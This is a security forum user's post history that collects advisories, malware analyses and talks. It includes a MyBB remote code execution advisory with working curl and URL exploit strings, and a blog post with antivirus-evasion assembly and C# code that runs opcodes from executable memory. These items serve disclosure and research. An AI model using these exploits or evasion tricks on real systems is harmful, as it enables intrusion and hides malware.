Everything posted by Nytro

  1. broadAnyWhere_poc_by_retme_bug_17356824

PoC source code of Android Bug: 17356824.

Diff of the bug: https://android.googlesource.com/platform/packages/apps/Settings/+/37b58a4%5E%21/#F0

You can send a broadcast to almost ANY receiver you want, even if it is a protected broadcast or the receiver is an unexported / permission-limited one. All devices prior to Android 5.0 are affected.

Demo video: Bug 17356824 poc video

More info: broadAnywhere (Bug: 17356824) - Retme

Source: https://github.com/retme7/broadAnyWhere_poc_by_retme_bug_17356824#broadanywhere_poc_by_retme_bug_17356824
  2. Nytro

RST T-shirt

Can you give us a large PSD / PNG of this logo? Just the logo, without the CSS behind it?
  3. MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability

# Exploit Title: MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability
# Date: 2014-11-21
# Exploit Author: Taoguang Chen
# Vendor Homepage: twitter.com/chtg57
# Software Link: www.mybb.com
# Version: MyBB 1.8 <= 1.8.2 and MyBB 1.6 <= 1.6.15

MyBB has released 1.8.3 and 1.6.16 to fix this vulnerability.

Advisory: https://gist.github.com/chtg/e9824db42a8edf302b0e

# MyBB <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution Vulnerability

Taoguang Chen <[@chtg](http://github.com/chtg)> - 2014.03.06

> MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allow remote code execution.

## I. MyBB's unset_globals() Function Bypass

When PHP's register_globals configuration is set on, MyBB will call the unset_globals() function, and all global variables registered by PHP from the $_POST, $_GET, $_FILES, and $_COOKIE arrays will be destroyed.

```
if(@ini_get("register_globals") == 1)
{
    $this->unset_globals($_POST);
    $this->unset_globals($_GET);
    $this->unset_globals($_FILES);
    $this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
    if(!is_array($array))
    {
        return;
    }

    foreach(array_keys($array) as $key)
    {
        unset($GLOBALS[$key]);
        unset($GLOBALS[$key]); // Double unset to circumvent the zend_hash_del_key_or_index hole in PHP <4.4.3 and <5.1.4
    }
}
```

But the unset_globals() function can be bypassed.

### i) $_GET, $_FILES, or $_COOKIE Array was Destroyed

```
foo.php?_COOKIE=1 // $_GET['_COOKIE']
```

When $_GET['_COOKIE']=1 is sent, unset_globals() will destroy $GLOBALS['_COOKIE'].

```
$this->unset_globals($_GET);
...
}
...
function unset_globals($array)
{
    ...
    foreach(array_keys($array) as $key)
    {
        unset($GLOBALS[$key]);
```

This means the $_COOKIE array will be destroyed.

This also means all global variables registered by PHP from the $_COOKIE array will be destroyed, because they will not be handled by unset().

```
$this->unset_globals($_COOKIE);
}
...
}
...
function unset_globals($array)
{
    if(!is_array($array))
    {
        return;
    }
```

By the same token, if the $_GET or $_FILES array was destroyed via unset_globals(), the corresponding global variables registered by PHP will not be destroyed.

### ii) $GLOBALS Array was Destroyed

```
foo.php?GLOBALS=1 // $_GET['GLOBALS']
```

When $_GET['GLOBALS']=1 is sent, unset_globals() will destroy $GLOBALS['GLOBALS']. This means the $GLOBALS array will be destroyed.

The $GLOBALS array is an automatic global variable bound to the global symbol table; you can use $GLOBALS['key'] to access or control a global variable in all scopes throughout a script. This means that the binding between the $GLOBALS array and the global symbol table will be broken because the $GLOBALS array has been destroyed. This also means all variables registered by PHP from the $_GET, $_FILES and $_COOKIE arrays will not be destroyed.

By the same token, when $_POST['GLOBALS'], $_FILES['GLOBALS'], or $_COOKIE['GLOBALS'] is sent, unset_globals() will destroy the $GLOBALS array, and then the corresponding global variables registered by PHP will not be destroyed.

In fact, MyBB is already aware of the problem:

```
$protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS");
foreach($protected as $var)
{
    if(isset($_REQUEST[$var]) || isset($_FILES[$var]))
    {
        die("Hacking attempt");
    }
}
```

Unfortunately, there is a small hole yet :-)

$_REQUEST is an associative array that by default contains a mix of the $_GET, $_POST, and $_COOKIE array data. But PHP >= 5.3 introduced the request_order configuration directive, which affects the contents of the $_REQUEST array.

```
request_order = "GP"
```

This is the recommended setting in php.ini. Setting it to "GP" means only the $_GET and $_POST array data is merged into the $_REQUEST array, without the $_COOKIE array data. So it is possible to send $_COOKIE['GLOBALS'] and bypass the unset_globals() function in PHP 5.3.

## II. Remote Code Execution Vulnerability

There is one interesting method in MyBB:

```
class MyBB {
    ...
    function __destruct()
    {
        // Run shutdown function
        if(function_exists("run_shutdown"))
        {
            run_shutdown();
        }
    }
}
```

Look into the run_shutdown() function:

```
function run_shutdown()
{
    global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
    ...
    // Run any shutdown functions if we have them
    if(is_array($shutdown_functions))
    {
        foreach($shutdown_functions as $function)
        {
            call_user_func_array($function['function'], $function['arguments']);
        }
    }

    $done_shutdown = true;
}
```

The $shutdown_functions was initialized via the add_shutdown() function in init.php:

```
// Set up any shutdown functions we need to run globally
add_shutdown('send_mail_queue');
```

But the add_shutdown() function's initialization handler is wrong:

```
function add_shutdown($name, $arguments=array())
{
    global $shutdown_functions;

    if(!is_array($shutdown_functions))
    {
        $shutdown_functions = array();
    }

    if(!is_array($arguments))
    {
        $arguments = array($arguments);
    }

    if(is_array($name) && method_exists($name[0], $name[1]))
    {
        $shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
        return true;
    }
    else if(!is_array($name) && function_exists($name))
    {
        $shutdown_functions[] = array('function' => $name, 'arguments' => $arguments);
        return true;
    }

    return false;
}
```

In the above code we see that the run_shutdown() function is vulnerable because $shutdown_functions is initialized correctly and therefore results in arbitrary code execution.

## III. Proof of Concept

When request_order = "GP" and register_globals = On, remote code execution by just using curl on the command line:

```
$ curl --cookie "GLOBALS=1; shutdown_functions[0][function]=phpinfo; shutdown_functions[0][arguments][]=-1" http://www.target/
```

## IV. P.S. I

**Another case to exploit the vulnerability:**

When PHP's "disable_functions" configuration directive disables the ini_get() function:

```
disable_functions = ini_get
```

The unset_globals() function will not be called, regardless of whether register_globals is set on or off.

```
if(@ini_get("register_globals") == 1)
{
    $this->unset_globals($_POST);
    $this->unset_globals($_GET);
    $this->unset_globals($_FILES);
    $this->unset_globals($_COOKIE);
}
```

**Proof of Concept**

Works on disable_functions = ini_get and register_globals = On:

```
index.php?shutdown_functions[0][function]=phpinfo&shutdown_functions[0][arguments][]=-1
```

## V. P.S. II

**SQL injection vulnerability via the run_shutdown() function**

```
function run_shutdown()
{
    global $config, $db, $cache, $plugins, $error_handler, $shutdown_functions, $shutdown_queries, $done_shutdown, $mybb;
    ...
    // We have some shutdown queries needing to be run
    if(is_array($shutdown_queries))
    {
        // Loop through and run them all
        foreach($shutdown_queries as $query)
        {
            $db->query($query);
        }
    }
```

The $shutdown_queries was initialized in global.php:

```
$shutdown_queries = array();
```

But not all files include global.php, for example css.php:

```
require_once "./inc/init.php";
```

global.php is not included there, and $shutdown_queries is uninitialized, with the result that there is a SQL injection vulnerability.

**Proof of Concept**

Works on request_order = "GP" and register_globals = On:

```
$ curl --cookie "GLOBALS=1; shutdown_queries[]=SQL_Inj" http://www.target/css.php
```

Works on disable_functions = ini_get and register_globals = On:

```
css.php?shutdown_queries[]=SQL_Inj
```

## VI. Disclosure Timeline

* 2014.03.06 - Notified the MyBB devs via security contact form
* 2014.11.16 - Renotified the MyBB devs via Private Inquiries forum because no reply
* 2014.11.20 - MyBB developers released MyBB 1.8.3 and MyBB 1.6.16
* 2014.11.21 - Public Disclosure

Source: MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability
  4. SandWorm's target: A patch history of Object Packager

Matt_Oh | November 20, 2014

Last Patch Tuesday (that is, November 11, 2014), Microsoft released MS14-064, a security patch for a SandWorm 0-day vulnerability. They had also previously patched the vulnerability with the October Patch Tuesday release (MS14-060), but malware samples working around the fix were subsequently found in the wild.

Interestingly, the affected module, Object Packager, had suffered a similar issue in 2012 with security bulletin MS12-005. That issue was about remote code execution using the ClickOnce functionality embedded in Microsoft Office files. The issues with the latest two patches this year concern remote code execution with INF or EXE files embedded in Microsoft Office files; only the type of embedded object differs. When I looked into the patch, I found striking similarities between them. Here are my findings.

Marking files unsafe

One of the main similarities between the patches is with the zone identifier. Both MS12-005 and MS14-060 add code to mark files unsafe by using a zone identifier. This pops up a warning dialog box on the user's screen before binaries are executed. This provides additional protection for the user - any embedded object dropped in the temporary folder from Office documents should be treated as potentially dangerous.

How MarkFileUnsafe works

To understand what the MarkFileUnsafe function does, I opened packager.dll up in IDA. After a bit of debugging, I found that it uses the CZoneIdentifier object to set the zone identifier ID to 3 (URLZONE_INTERNET), as we see in Figure 1. The zone identifier concept was first introduced with Windows XP SP2 and it uses an Alternative Data Stream file, Zone.Identifier, to mark a file's origin. For example, if a file was downloaded from the Internet through a web browser, it would be marked with 'ID 3', which corresponds to URLZONE_INTERNET. For a good explanation of the CZoneIdentifier, see this blog post from Microsoft.

Figure 1: Calling CZoneIdentifier::SetId with argument 3 (URLZONE_INTERNET)

Marking the file with ID 3 means that the file is treated as unsafe. When it is executed, it triggers a user confirmation dialog that looks like the one shown in Figure 2. This is a road block to malware or exploits that may try to abuse the related feature.

Figure 2: Security Warning dialog

CVE-2014-4114

The CVE-2014-4114 vulnerability used in the SandWorm operation was fixed mainly by marking dropped files unsafe (as I explained in my previous blog post). Figure 3 shows three functions that have been patched by adding a call to the MarkFileUnsafe function. The whole point of the MS14-060 patch was to mark dropped files as unsafe.

Figure 3: Three functions patched with the addition of the MarkFileUnsafe function call

CVE-2012-0013

An interesting fact is that a similar patch to other functions with similar functionality had been performed in 2012 with MS12-005. It fixed the CVE-2012-0013 vulnerability, which allowed execution of the ClickOnce application embedded in Microsoft Office files. Looking at Figure 4 you can see that the MarkFileUnsafe function was added to the patched packager.dll file.

Figure 4: Patched functions with MS12-005

Some of the patched functions, including CPackage::CreateTempFile and CPackage::EmbedreadFromStream, introduced a call to MarkFileUnsafe just after copying the file to the temporary folder, as shown in Figure 5.

Figure 5: Addition of a call to MarkFileUnsafe

Similar issues in the same function - CPackage::DoVerb

Somehow, one specific function, CPackage::DoVerb, is a 'hot zone' which is patched again and again. The reason for this is that this is the main function where all the external command and object handling occurs using shell extensions and COM interfaces.

CVE-2014-6352

A 'verb' is the term used to describe a case where a command string is passed through the Object Packager to an external component. The original intended purpose of the Object Packager from Office was mostly to play animation with graphics and sound. This verb can be used to pass various commands to the non-OLE component. Verb commands are basically strings like "play", "pause" and "resume", etc., but there are two special defined verb values: "0" and "1". The first, "0", means open the object for editing, while "1" means open the object for "viewing". This MSDN article has a good description of this feature. However, it looks like you can also pass other numbers that perform additional operations, including running linked programs with the attachment itself as the input.

Figure 6: Show OK/Cancel message box

Figure 6 shows how this vulnerability was fixed. It displays an additional message box before it calls the InvokeCommand method from the CDefFolderMenu class in shell32.dll. The message box can be turned off if you set a special registry key, as shown in Figure 7. To fix it, they made opt-out the default behavior for this function.

Figure 7: Retrieve registry value

CVE-2012-0013

CVE-2012-0013 also had a patch on this same method, CPackage::DoVerb. When the ClickOnce application was embedded inside a Microsoft Office file, it could bypass the special check in the Object Packager. Figure 8 and Figure 9 show the GiveWarningMsg methods called just before dangerous operations like ActivateEmbeddedFile or ShellExecuteExW that launch external programs are performed.

Figure 8: Unpatched code with the GiveWarning call

Figure 9: Unpatched code with the GiveWarning call

The approach with unpatched code used a blacklist of file extensions, as Figure 10 shows. Figure 11 shows part of the GiveWarningMsg function. It passed a blacklist of extensions to the sub-function to compare. If the file's extension was on this list, it did not pass through to the following dangerous operations.

Figure 10: Extension black list

Figure 11: Check extension black list

But, it looks like this blacklist didn't cover every possible dangerous extension, and ClickOnce was one of those. The patch from the vendor solves this problem by ditching the blacklist approach, instead using an opt-in registry key. If you don't set a specific registry key, you will not be allowed to run any dangerous APIs by default, as shown in Figure 12.

Figure 12: Checking opt-in registry key

For example, based on this registry key, ShellExecuteEx will either be allowed or not, as we see in Figure 13. The point is that by default, the dangerous operation is blocked. This is a similar approach to how CVE-2014-6352 was solved using a default opt-out approach.

Figure 13: By default, show message and exit

Conclusion

So, packager.dll has gone through three rounds of patching over the last few years: MS12-005, MS14-060 and MS14-064. MS12-005 fixed the CVE-2012-0013 ClickOnce issue. MS12-005 and MS14-064 cover a special verb command issue. The problem is that the three patches touch on the same issues over and over again. MS12-005 introduced the MarkFileUnsafe function and applied it to two functions. Now MS14-060 applies the same patches to an additional three functions that perform very similar actions: file dropping. MS12-005 fixed an extension validation issue in the CPackage::DoVerb function by introducing a special registry key switch. MS14-064 fixed a very similar issue inside the exact same function by introducing a special registry key and confirmation message box. MS12-005 fixed a dangerous call to the ShellExecuteExW API and MS14-064 fixes dangerous usage of the IContextMenu interface, which can be abused to run arbitrary commands through the extension context menu functionality. Using the IContextMenu interface to launch remote code execution isn't obvious at first, but allowing a COM call to the shell component doesn't sound so secure either.

Based on my findings, I think there was a good chance to fix the SandWorm vulnerability two years ago, before it was used by malware authors and became an issue. We can't reverse time, but we can, and should, learn from the past.

Source: SandWorm's target: A patch history of Object Packa... - HP Enterprise Business Community
  5. UNREAL MODE: BREAKING PROTECTED PROCESSES

Alex Ionescu, NSC 2014
Alex Ionescu's Blog, @aionescu

INTRODUCTION

• Windows Vista introduced core changes to the kernel to allow atomic, kernel-driven process creation inside of a "protected environment"
• Used to protect access to the DRM keys and to secure the System process
• Windows 8.1 extends that model in order to protect key non-DRM system processes even from Admin, and to mitigate against pass-the-hash attacks
• Digital signatures and code signing now add an additional boundary of protection beyond load/don't load
• Similar to the iOS Entitlement Model
• Mechanisms change a few core security paradigms:
  • Admin == Kernel is something that Microsoft has sometimes disagreed with, especially in light of PatchGuard, Code Signing and DRM. Now it's really !=
  • Unkillable processes and unstoppable services are now something supported and documented for developer (mis)use

Download: http://www.nosuchcon.org/talks/2014/D3_05_Alex_ionescu_Breaking_protected_processes.pdf
  6. assembly, c-sharp, anti-sandbox, anti-antivirus, anti-debug, and malware research

Hello fellow readers! You all are probably wondering what the hell I've been up to this past month. Lots of stuff. This post is all over the place with code and slides and malware and general wackiness. Rather than spreading it out over several blog posts, I decided to just get it all over with so I can focus on cooler things in the future.

I saw an interesting webinar on sandbox detection techniques employed by malware by Cyphort. They haven't released their slides like they said they would, so here are the ones I took. These are cool and all, but I felt like I could contribute. I read an awesome paper on bypassing antiviruses by employing a number of code based tricks. The idea behind them was that AV's will skip binaries based on certain behaviors. One thing missing though: an AV will skip the "dropper" heuristic if the file ends in '.msi'. All the code I saw was in C/C++. I figured why not try and convert it to assembly? Next thing to do is make a patcher that can inject these into pre-compiled binaries. A future project perhaps? Anyways, I only did 2 before I lost interest. Read the article here.

```
;AV bypass 1
xor eax, eax
db Caption "Joe"
db Text "Giron"
mov edx, 5F5E100h
joe:
inc eax
dec edx
jnz joe
cmp eax, 5F5E100h
jnz short urafag
push 0 ; MB_OK
push offset Caption
push offset Text
push 0 ; hWnd
call MessageBoxA
urafag:
xor eax, eax
retn

;AV bypass 1.5
; same as above, just using the loop instruction instead of branching conditionals
xor eax, eax
db Caption "Joe"
db Text "Giron"
mov ecx, 5F5E100h
joe:
; essentially do nothing
mov eax,10
mov ebx,20
xchg eax,ebx
loop joe
; now start code
xor eax,eax
xor ebx,ebx
push 0 ; MB_OK
push offset Caption
push offset Text
push 0 ; hWnd
call MessageBoxA
retn

;AV bypass 2
push ebx
push edi
push 5F5E100h ; bytes to alloc
push 40h ; zero init
call GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short cleanup
mov edi, ebx
mov eax, 0FFFFFFF1h
mov ecx, 5F5E100h
rep stosb
push 0 ; MB_OK
push offset Caption ; "Joe"
push offset Text ; "Giron"
push 0 ; hWnd
call MessageBoxA
push ebx ; memory handler
call GlobalFree
cleanup:
xor eax, eax
pop edi
pop ebx
retn
```

Feels good to put my crappy assembly skills to good use. Especially now that I figured out how to use inline assembly within C#. Sort of. The way it works is by utilizing delegates and cramming code inside an executable code page. Observe this piece of genius:

```
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;

namespace InLineAsm
{
    static class Program
    {
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        delegate void JoesAntiDebuggery();

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, IntPtr flAllocationType, IntPtr flProtect);

        // opcodes taken from disassembled program.
        static byte[] opcodez = {
            0x55, 0x89, 0xE5, 0x31, 0xC0, 0xBA, 0x00, 0xE1, 0xF5, 0x05, 0x40, 0x4A, 0x75, 0xFC, 0x3D, 0x00,
            0xE1, 0xF5, 0x05, 0x75, 0x14, 0x6A, 0x00, 0x68, 0x12, 0x70, 0x40, 0x00, 0x68, 0x0C, 0x70, 0x40,
            0x00, 0x6A, 0x00, 0xFF, 0x15, 0xD0, 0x80, 0x40, 0x00, 0x31, 0xC0, 0x68, 0x00, 0x70, 0x40, 0x00,
            0xE8, 0x3B, 0x00, 0x00, 0x00, 0x59, 0x31, 0xC0, 0x89, 0xEC, 0x5D, 0xC3
        };
        /*
        __asm {
            xor eax, eax
            mov edx, 5F5E100h
        joe:
            inc eax
            dec edx
            jnz joe
            cmp eax, 5F5E100h
            jnz short urafag
        }
        MessageBox(0, Text, Caption, 0);
        __asm {
        urafag:
            xor eax, eax
        }
        */

        // EXECUTE_READWRITE, MEM_COMMIT | MEM_RESERVE
        static IntPtr codeBuffer = VirtualAlloc(IntPtr.Zero, new UIntPtr((uint)opcodez.Length), (IntPtr)(0x1000 | 0x2000), (IntPtr)0x40);
        static JoesAntiDebuggery JoeDbg;

        // Static constructor: copying the bytes and building the delegate are statements,
        // so they cannot sit directly at class scope as field initializers.
        static Program()
        {
            Marshal.Copy(opcodez, 0, codeBuffer, opcodez.Length);
            JoeDbg = (JoesAntiDebuggery)Marshal.GetDelegateForFunctionPointer(codeBuffer, typeof(JoesAntiDebuggery));
        }

        static void Main(string[] args)
        {
            Console.Write("lol");
            JoeDbg();
        }
    }
}
```

It's a thing of beauty: Assembly, C code, op codes / hex, delegates, and C#.

Moving on to what else I've been up to: pulling apart malwarez. This one piece gave me trouble for a few days. Namely because of the weird anti-debugging counter measure I encountered. I'm unsure if it's even anti-debug as the conditions always seem to equate to false. I mean it's easy to get around when you see it, but you can't get around it automatically; you have to patch it. I even took a video of the weird behavior.

Took me some time, but I figured it out. The following is the sequence called not 5 instructions after the entry point:

```
sub_4017CF proc near
push ebp
mov edi, edx
add edi, ebx
not ebx
mov ebp, esp
add edi, ebx
add esp, 0FFFFFF94h
mov edx, ebx
inc ebx
mov ecx, esp
dec ebx
mov edi, eax
add ecx, 48h
mov ebx, ecx
dec edi
cmp eax, ecx
jz short labelforyou
neg edx
leave
not edx
mov eax, edi
neg eax
leave
add edx, edi
not edx
retn
labelforyou:
leave
retn
```

The first thing you may notice about this procedure is the weird stack frame setup. Most of the time, the intro stack frame will be "push ebp" followed directly by "mov ebp, esp". This one is different in that it plays with the registers a little before the "mov ebp, esp" assembly codes. You may also notice the 2 "leave" instructions at the end of the procedure as opposed to the 1 for the "labelforyou" conditional. The 2 "leave" instructions are why the program jumps to ExitThread. When you leave a stack frame twice and 'ret', any Windows program jumps to ntdll.RtlExitUserThread. An interesting intrinsic way of quietly exiting without warning.

But what about the code that leads up to the 'JZ' branch and the 2 leaves? The comparison is EAX to ECX. Every time I run, EAX always ends up as 1 and ECX as some stack address. I'm postulating that the malware I grabbed was extracted from a dropper. That makes sense given the stack value / pointer points to nothing useful. If you're curious what the malware does, it attempts to download and run a 'doc' file from a Russian host. Inside the 'doc' file is HTML code with a meta redirect to a host my DNS server can't seem to find. You can download the malware here. Pass in 'infected'.

The other piece of malware I went through lacked a DOS stub. Most exe's have this little DOS application inside that reads "this program cannot be run in DOS mode" and is placed at the start of an exe just in case someone attempts to run an exe on an old DOS system. It's a forward compatibility thing Microsoft does. Compare a normal exe to the binary. So how the hell do you remove the DOS stub and still maintain functionality? According to TinyPE, you do it in assembly via zeroing out the MZ header with the exception of the 'e_magic' field 'MZ' at the start and the 'e_lfanew' field value at the bottom. The 'e_lfanew' field is just a 4 byte offset to where the PE header is located.

```
mzhdr:
    dw "MZ"        ; e_magic
    dw 0           ; e_cblp UNUSED
    dw 0           ; e_cp UNUSED
    dw 0           ; e_crlc UNUSED
    dw 0           ; e_cparhdr UNUSED
    dw 0           ; e_minalloc UNUSED
    dw 0           ; e_maxalloc UNUSED
    dw 0           ; e_ss UNUSED
    dw 0           ; e_sp UNUSED
    dw 0           ; e_csum UNUSED
    dw 0           ; e_ip UNUSED
    dw 0           ; e_cs UNUSED
    dw 0           ; e_lfarlc UNUSED
    dw 0           ; e_ovno UNUSED
    times 4 dw 0   ; e_res UNUSED
    dw 0           ; e_oemid UNUSED
    dw 0           ; e_oeminfo UNUSED
    times 10 dw 0  ; e_res2 UNUSED
    dd pesig       ; e_lfanew
```

But what about doing it to a pre-compiled binary? I just used CFF Explorer and HxD. Jot down the 'e_lfanew' field offset and zero out the entries between the PE header, the MZ field, and the 'e_lfanew' field.

The malware does code running modification and is surprisingly sophisticated, but this blog post is long enough. I'm done for now. The next post will be much more interesting, however it's unfinished and needs more research. Expect it soon.

This entry was posted on Saturday, November 22nd, 2014 at 1:51 pm and is filed under code, Joe you evil bastard, reversing.

Source: assembly, c-sharp, anti-sandbox, anti-antivirus, anti-debug, and malware research « Joe's Security Blog
  7. malware repository framework - for personal use only

malwaRE - Malware repository framework

Description

malwaRE is a malware repository website created using the PHP Laravel framework, used to manage your own malware zoo. malwaRE was based on the work of the Adlice team with some extra features. If you guys have any improvements, please let me know or send me a pull request.

Features

- Self-hosted solution (PHP/MySQL server needed)
- VirusTotal results (option for uploading unknown samples)
- Search filters available (vendor, filename, hash, tag)
- Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
- Add writeup url(s) for each sample
- Manage samples by tag
- Tag autocomplete
- VirusTotal rescan button (VirusTotal's score column)
- Download samples from repository

Source: https://github.com/c633/malwaRE
  8. A Nightmare on Malware Street CoinVault ransomware in the wild By Santiago Pontiroli on November 22, 2014. 4:49 Another ransomware has been spotted in the wild lately, branded as 'CoinVault'. This one involves some interesting details worth mentioning, including the peculiar characteristic of offering the free decryption of one of the hostage files as a sign of good faith. Technically, the malware writers have taken a lot of measures to slow down the analysis of the sample. Even though it was made with Microsoft's .NET framework, it takes a while to reach the core of their malicious application. Upon opening the initial sample in 'IL Spy', we find that the program starts by using a string key which is passed to a decryption method, which will ultimately get the executable code. A byte array is also passed as a parameter to the 'EncryptOrDecrypt' method, which in conjunction with the key will output a final byte array with the malware's much needed code. Implementing these functions in Visual Studio is as easy as copy/paste, so we execute the methods gotten from the source code and set a breakpoint to check what the decryption method is doing. A '77', '90' in decimal tells us we are on the right track since when converting these numbers to hexadecimal we get '4D', '5A', which is the magic number for DOS executable files identified by the ASCII string 'MZ'. We dump all the bytes to an executable file in disk for further analysis. We get a file called 'SHIELD runner', serving as a 'RunPE' helper application. A 'RunPE' application serves to execute files on the fly, meaning that a memory stream is created from an input and executed directly without first storing the file to disk. This is useful for malware writers that want to avoid leaving traces behind, and as we'll soon see, it's not all this file has to offer. 
Although we'll carry on with our investigation into the ransomware code, there's a noteworthy string embedded in the SHIELD runner executable, 'd:\Users\dennis…'. In the same way as before, a string key and a byte array are used to generate yet another executable file. As you can see, the cybercriminals have gone to great lengths in order to slow down the analysis and hide the malicious payload for as long as possible. Not only do we have the usual 'RunPE' functions but also a nice additional set of methods that will help the malware detect analysis tools and virtualized environments. It checks for 'Sandboxie', 'Wireshark', 'Winsock Packet Editor' and even checks whether the machine's name is 'MALTEST'. Fortunately, none of these conditions are met in my environment so we are good to go. But wait…. there's more! The detection of the virtualized environment will cause the execution to stop and the malicious payload to be hidden. Using PowerShell, we are going to check if the malware can actually detect our environment. Apparently it can, so we'll need to carry out some simple modifications in order to continue the analysis process. We can fix this easily from VMWare's configuration VMX file, setting the option 'SMBIOS.reflectHost = TRUE'. Running out PowerShell checks again, we witness the good news and are ready to go even further. Repeating the process of string key and byte array decryption and dumping the memory at just the right time pays off and we finally end up with the set of files that will be used during the infection. The CoinVault 'Locker' has two main Windows forms: the main one telling us to pay in order to recover the victim's files and 'frmGetFreeDecrypt' which is used to decrypt one of the victim's files as a way to demonstrate that we can in fact recover our precious information if we comply in a timely manner. However, before the 'Locker' analysis we'll need to deobfuscate it (at least a little bit). 
The malware writers display some sense of humor here: if the analyst has gone through this much trouble to reach this point it seems he's welcome as suggested by the phrase, 'Your worst nightmare'. Moreover, they are keen enough to leave a banner signaling the obfuscation utility they used. In this case we are dealing with the ever popular 'Confuser', in its version 1.9.0.0. Certainly, this is confusing… but we can make it better. So, we go from something that resembles a Chinese manuscript to readable source code. We now can see, amongst the many (many) methods and delegates inside the assembly some relevant code regarding the file encryption. .NET's 'System.Security.Cryptography.RijndaelManaged' namespace is used (amongst others) revealing symmetric encryption functionality. We can even get a glance at how the PRNG was implemented and some internal details of the malicious application. When we are finally shown the 'Locker' executable, a connection is made to a dynamic domain. During the analysis, two addresses were present: 'cvredirect.no-ip.net' and 'cvredirect.ddns.net'. They are currently offline and this hampers the 'Locker' functionality, since upon traffic analysis inspection we were able to see that a hardware ID is sent to the C&C in order to use a dynamic file encryption password. I guess now we can understand why the malware is checking for Wireshark in the system. After all, cybercriminals wouldn't want you to take a peek at how their business is getting done. At this point, if everything went well (for the cybercriminals) your personal documents and files have been encrypted and a payment is demanded in less than 24 hours or the price will rise. The bitcoin address used is dynamic too, making the tracing of the funds a lot more complex than usual. Is this your worst nightmare? If you don't have an updated anti-malware suite and (just in case) a backup of your most important files, it might just be. 
Kaspersky detects this family as 'Trojan-Ransom.Win32.Crypmodadv.cj'. We have already seen similar malicious applications in the past (regarding functionality) such as 'TorrentLocker', and some PowerShell ransomware, but the amount of effort invested in this one in order to protect the code shows that cybercriminals are leveraging already developed libraries and functionality in order to avoid reinventing the wheel.

Source: https://securelist.com/blog/virus-watch/67699/a-nightmare-on-malware-street/
  9. Now cyber criminals use E-cigarettes to spread malware

Many health specialists may be pushing the chain smokers in the world for E-cigarettes over normal tobacco ones. The smokers may not be embracing E-cigarettes wholeheartedly but there is one group who does. Yes, cyber criminals have taken a special liking to the E-cigarettes and now electronic cigarettes have become the latest vector for injecting malware.

How is the E-cigarette being used

The E-cigarettes have to be charged over USB, either with a special custom cable, or by plugging the cigarette itself directly into a USB port. The ones that come with the USB port charging are the ones that are fast becoming a favourite threat vector for the cyber criminals. The malware is apparently hardcoded into the charger for these E-cigarettes and as soon as it's hooked to a PC they start their malicious work. For one they are inconspicuous, who the hell would think that a puny E-cigarette might be carrying malware. The second point is that the USB port allows the cyber criminals to physically access your device.

Vapourizer

The use of E-cigarettes for injecting malware first surfaced on Reddit. A redditor, Jockrilla, posted the below comment on Reddit and that started things moving:

"I have a story I wanted to share about a data security breach at a large corporation. One particular executive had a malware infection on his computer from which the source could not be determined. The executive's system was patched up to date, had antivirus and up to date anti-malware protection. Web logs were scoured and all attempts made to identify the source of the infection but to no avail. Finally after all traditional means of infection were covered; IT started looking into other possibilities. They finally asked the Executive, "Have there been any changes in your life recently?" The executive answered, "Well yes, I quit smoking two weeks ago and switched to e-cigarettes".

And that was the answer they were looking for, the made in china e-cigarette had malware hard coded into the charger and when plugged into a computer's USB port the malware phoned home and infected the system. Moral of the story is: have you ever questioned the legitimacy of the $5 dollar EBay made in China USB item that you just plugged into your computer? Because you should, you damn well should. Sincerely, An IT guy"

The post seemed to suggest that a large corporation was subjected to a data breach because one of the execs had started smoking an E-cigarette or "vapourizer" which had malware hard coded into the charger. When the charger was plugged into the exec's system the malware infected it.

Plausible or fairy tale?

From the looks of it, the Redditor's claim looks very plausible given the fact that just recently, a security researcher, Karsten Nohl, had demonstrated the virtually unpatchable attack called BadUSB with its proof-of-concept. He had further stated that more than half the USB devices available in the market may be susceptible to the BadUSB attack. Combining the two reports gives you a plausible explanation for the malware spreading through an E-cigarette.

Dave Goss, of London's Vape Emporium, says that vapourizers can remain safe by buying from respected manufacturers such as Aspire, KangerTech and Innokin, and by checking for "scratch checkers" on the box, which mark out authentic goods from counterfeits. "Any electrical device that uses a USB charger could be targeted in this way, and just about every one of these electrical devices will come from China," he adds.

It is suggested to those who use such USB devices to only charge them through a wall adapter (they charge faster anyway). If you really need to charge through USB then you are advised to get what is called a "USB Condom", which will make sure that only power is drawn and no data is exchanged.

Source: Now cyber criminals use E-cigarettes to spread malware
  10. [h=3]Android IMSI-Catcher Detector (AIMSICD)[/h]

Android-based project to detect and avoid fake base stations (IMSI-Catchers) in GSM/UMTS Networks. Feel free to read the Press Releases about us, spread the word with our Media Material and help us solve current challenges!

[h=1]Index[/h]
Introduction
IMSI-Catchers
Project Goals
Limitations
Roadmap
WIP-RELEASES
Requirements
Installation
General (non-geek)
Technical (geek)
User Guide
Disclaimer
Privacy
Building
Changelog
Discussion
Contributing
Bugs
FAQ
Support
Sources
Credits
License
Sponsors
Contact
Recommendations

[h=1]Introduction[/h]

Both law enforcement agencies and criminals use IMSI-Catchers, which are false mobile towers acting between the target mobile phone(s) and the service provider's real towers. As such it is considered a Man In the Middle (MITM) attack. It was patented and first commercialized by Rohde & Schwarz in 2003, although it would be hard to maintain such a patent, since in reality it is just a modified cell tower with a malicious operator. On 24 January 2012, the Court of Appeal of England and Wales held that the patent is invalid for obviousness. But ever since it was first invented, the technology has been used and "improved" by many different companies around the world. Other manufacturers (like Anite) prefer to refer to this spying and tracking equipment in cozy marketing words as "Subscriber Trackers". In the USA this technology is known under the name "StingRay", which is even capable of tracking the people who are traveling together with the owner of a targeted phone across the country.

